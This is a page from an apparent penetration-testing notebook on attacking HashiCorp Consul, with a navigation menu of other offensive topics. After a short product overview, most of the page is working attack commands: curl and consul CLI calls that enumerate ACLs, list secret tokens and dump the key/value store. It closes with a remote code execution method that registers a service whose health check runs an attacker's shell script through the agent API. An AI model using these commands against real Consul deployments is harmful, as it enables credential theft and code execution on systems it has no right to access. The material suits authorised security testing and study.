PwnSec Notes
  • AppSec
    • General Notes
    • Payloads
    • Fuzzing
    • Code Review
    • ReDos
    • SSTI
    • LFI-RFI
    • PHP Tricks
    • Javascript
    • Serialization
    • SQL Injection
    • JWT
    • GraphQL
    • Side Channel
    • Command Execution
    • WebSockets
    • Ruby
    • 0Auth
    • Latex Injection
    • NoSQL
    • JS Analysis
    • Apache Lucene
  • Forensics
    • Basics
    • Network Captures
    • Windows Logs
    • Memory
    • Browser
    • Threat Intelligence
    • Disk
  • Binary-Exploitation
    • Concepts
    • Binary Analysis
    • Debugging
    • Shellcodes
  • Malware-Analysis
    • Memory Mapping
    • Macros
    • Unpacking
    • Analysis
    • Resources
  • Reverse-Engineering
    • GDB basics
    • MASM Basics
    • Decompilers
    • Useful Codes
  • Services
    • SNMP
    • Grafana
    • Consul
  • Network Pentesting
    • C2 Servers
    • Pivoting
    • CrackMapExec
    • Kubernetes
    • Docker
  • MISC
    • Slack
    • Git
    • Pyjails
    • Privilege Escalation
    • Python LOL Code
  • Cloud Hacking
    • AWS S3
    • AWS Cognito
  • Mobile Pentesting
    • Frida
    • ADB
    • Drozer
    • Smali
    • Static Analysis
    • Dynamic Analysis
    • Bypass SSL Pinning
    • APK Labs
    • Android Malwares
    • Abusing Firebase
    • Root Detection
Powered by GitBook
On this page
  • Overview
  • How does it work
  • Enumerating ACLS
  • Listing tokens
  • Enumerating Keys
  • Restoring Snapshots
  • Remote Code Execution
  1. Services

Consul

Service Networking Solution

PreviousGrafanaNextC2 Servers

Last updated 2 years ago

Overview

HashiCorp Consul is a service networking solution that enables teams to manage secure network connectivity between services and across on-prem and multi-cloud environments and runtimes. Consul offers service discovery, service mesh, traffic management, and automated updates to network infrastructure device. You can use these features individually or together in a single Consul deployment.

How does it work

Consul provides a control plane that enables you to register, query, and secure services deployed across your network. The control plane is the part of the network infrastructure that maintains a central registry to track services and their respective IP addresses. It is a distributed system that runs on clusters of nodes, such as physical servers, cloud instances, virtual machines, or containers.

Consul interacts with the data plane through proxies. The data plane is the part of the network infrastructure that processes data requests.

Enumerating ACLS

curl --header "X-Consul-Token: <TOKEN> --request GET http://127.0.0.1:8500/v1/acl/roles

Listing tokens

Requires an acl:write to view SecretId otherwise if acl:read is set; SecretId will be hidden.

curl --header "X-Consul-Token: <TOKEN> --request GET http://127.0.0.1:8500/v1/acl/tokens

Enumerating Keys

The /kv endpoints access Consul's simple key/value store, useful for storing service configuration or other metadata.

It is important to note that each datacenter has its own KV store, and there is no built-in replication between datacenters.

# Listing Keys
consul kv get -token <TOKEN> -keys
# Listing detailed data from all keys
consul kv get -token <TOKEN> -recurse -detailed <KEY>

Restoring Snapshots

consul snapshot restore -token <TOKEN> backup.snap

Remote Code Execution

We can achieve Remote code execution if we have the privileges to register a new service.

  • Payload.json

{
  "ID": "meow",
  "Name": "meow",
  "Tags": ["primary", "v1"],
  "Address": "127.0.0.1",
  "Port": 8000,
  "Meta": {
    "redis_version": "4.0"
  },
  "EnableTagOverride": false,
  "Check": {
    "DeregisterCriticalServiceAfter": "90m",
    "Args": ["/bin/bash","/tmp/abuqasem.sh"],
    "Interval": "10s",
    "Timeout": "1h"
  },
  "Weights": {
    "Passing": 10,
    "Warning": 1
  }
}

  • Now Trigger

 curl \
    ---header "X-Consul-Token: <TOKEN>
    --request PUT \
    --data @payload.json \
    http://127.0.0.1:8500/v1/agent/service/register?replace-existing-checks=true

Reference:

https://developer.hashicorp.com/consul/api-docs/agent/service#register-servic